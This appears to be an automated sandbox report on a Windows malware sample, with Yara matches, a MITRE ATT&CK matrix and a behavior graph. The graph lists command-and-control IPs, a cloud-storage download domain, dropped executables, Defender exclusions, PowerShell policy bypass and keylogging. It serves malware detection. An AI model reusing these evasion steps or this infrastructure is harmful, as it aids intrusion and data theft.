Source: Yara match | File source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.28.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.428486b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.32.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2df1053.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4252c53.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.23.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.4511bf3.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.16.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.37.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.925ddb.25.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.90edfb.18.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.35.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.31.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.20.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.29.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.21.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.24.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2ef05bf.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.2c51004.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.33.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.27.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.34.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.8fe043.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.15.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe10a3.17.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.92fcab.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.454380b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.22.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.3070000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.3fe80cb.19.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.428486b.26.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.36.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.leBwnyHIgx.exe.4252c53.30.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.leBwnyHIgx.exe.44e05eb.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.2572510543.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107343124.0000000003FE6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3504281885.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2572570751.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847762945.000000000092F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231349112.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3992441735.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134424377.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3282299406.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3847713177.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956428544.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729342507.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2956631944.0000000003FE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3635220624.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135196957.00000000044E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134301268.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3807432806.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394511408.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2092467129.00000000008FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2916173628.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3787990039.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462635907.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2394414538.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2231413227.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4134547256.0000000002EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.4135092176.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3148323285.0000000003FE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.2729432226.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3462916069.0000000004251000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107145495.000000000090E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.3107580457.00000000041E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: leBwnyHIgx.exe PID: 180, type: MEMORYSTR
MITRE ATT&CK Matrix, listed by tactic (the number in parentheses is the count the report shows next to that technique; techniques without a number are shown without one):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances

Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains

Initial Access: Replication Through Removable Media (1); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools

Execution: Native API (1); Command and Scripting Interpreter (2); PowerShell (1); Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript

Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Privilege Escalation: Exploitation for Privilege Escalation (1); DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (223); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd

Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (21); Software Packing (1); DLL Side-Loading (1); Masquerading (1); Modify Registry (1); Virtualization/Sandbox Evasion (31); Access Token Manipulation (1); Process Injection (223); Indicator Removal (1)

Credential Access: Input Capture (121); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture

Discovery: System Time Discovery (2); Peripheral Device Discovery (11); File and Directory Discovery (3); System Information Discovery (36); Query Registry (1); Security Software Discovery (131); Virtualization/Sandbox Evasion (31); Process Discovery (3); Application Window Discovery (11); Network Service Discovery; System Network Connections Discovery

Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools

Collection: Archive Collected Data (1); Screen Capture (1); Input Capture (121); Clipboard Data (2); Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging

Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (13); Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols

Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol

Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
Behavior Graph ID: 1585743 | Sample: leBwnyHIgx.exe | Startdate: 08/01/2025 | Architecture: WINDOWS | Score: 100
(numbers in square brackets are the graph's node ids; a number directly after a process name is the count the graph shows on that node, see legend above)

[2] Start
    DNS: xrpy.oss-ap-southeast-1.aliyuncs.com
    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 7 other signatures
    started: [9] leBwnyHIgx.exe 19

[9] leBwnyHIgx.exe
    Network: 154.82.85.107 (ports 15091, 15092, 18852; ROOTNETWORKSUS Seychelles); xrpy.oss-ap-southeast-1.aliyuncs.com 47.79.48.230 (ports 443, 49732; VODAFONE-TRANSIT-ASVodafoneNZLtdNZ United States)
    Dropped: C:\Users\user\Downloads\wpsv.5.6.3.exe (PE32); C:\Users\user\AppData\...\leBwnyHIgx.exe (PE32); C:\Users\...\leBwnyHIgx.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\wpsv.5.6.3[1].exe (PE32)
    Signatures: Adds a directory exclusion to Windows Defender
    started: [14] leBwnyHIgx.exe 3 2; [17] cmd.exe 1; [19] cmd.exe 1; [21] cmd.exe 1

[14] leBwnyHIgx.exe
    Signatures: Multi AV Scanner detection for dropped file; Contains functionality to inject threads in other processes; Contains functionality to capture and log keystrokes; Contains functionality to inject code into remote processes
    started: [23] cmd.exe; [25] cmd.exe

[17] cmd.exe
    Signatures: Bypasses PowerShell execution policy; Adds a directory exclusion to Windows Defender
    started: [27] powershell.exe 22; [30] conhost.exe

[19] cmd.exe
    started: [32] powershell.exe 1 22; [34] conhost.exe

[21] cmd.exe
    started: [36] powershell.exe 39; [38] conhost.exe

[23] cmd.exe
